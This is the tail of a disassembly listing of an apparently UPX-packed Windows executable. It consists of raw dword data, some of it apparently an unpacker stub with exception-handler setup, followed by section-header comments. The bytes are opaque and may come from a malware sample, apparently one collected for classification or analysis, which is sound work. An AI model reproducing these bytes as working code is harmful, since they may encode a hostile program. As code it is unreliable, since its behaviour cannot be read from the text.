dd 32587EA4h, 1BC18C51h, 341FFE99h, 6560EEDCh, 0C78C9B85h
dd 0FAE5869Ah, 5D006DD7h, 8FF1598Ch, 72AEAB90h, 0DA101B8Fh
dd 5E1D8E9Eh, 8EAC777Ah, 67493288h, 0BE48A6FFh, 97F7D1ABh
dd 0B0A47EB9h, 603001DBh, 7BBF9973h, 0FA8531DAh, 5202020Ah
dd 52789EE1h, 4545EE4Ch, 1B3D916Bh, 0BA949277h, 0CC708BE9h
dd 0A0BA6FAh, 0F869683Ch, 0F23749Ah, 92B8B652h, 3EAB4693h
dd 32DAAEBEh, 0F6E283C3h, 0F6DB7E92h, 0C6FE6704h, 7774714Bh
dd 6E5635DFh, 2D029FACh, 0C51F6E53h, 61A911EBh, 0A3022C4h
dd 0CA2955E4h, 0DA002663h, 4268935Ch, 0AAF0341Ch, 12386E3Ch
dd 7AB02EECh, 0C6CA2E54h, 4BF52EBCh, 0B130FE24h, 0D840668Ch
dd 0D625CED8h, 0C4DD3A78h, 2E786647h, 0BA086635h, 0A9486E94h
dd 0D780F2A8h, 1F9924EFh, 5AB69E4Bh, 3D09B4DCh, 2E921763h
dd 97B9DC04h, 2326416Fh, 51523CBAh, 8815FF73h, 90010010h
dd 5E8h, 56E800h, 64670000h, 36FFh, 26896467h, 0C0290000h
dd 0C008C8FEh, 0F8750474h, 35E867EBh, 81000000h, 1DD9C1h
dd 291DBF00h, 0E5BE0000h, 0FC000000h, 18A51FCh, 0F03166FCh
dd 0C1830186h, 0C6816601h, 0EF8300CDh, 75FF0901h, 8F6459E9h
dd 5, 0E1FF5E00h, 90C35159h, 10244C8Bh, 818FC031h, 0B8h
dd 896430C3h, 20h, 1B1h dup(0)
dd 7FFD5000h, 1405h dup(0)
UPX2 ends
; Section 4. (virtual address 0001A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3143A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start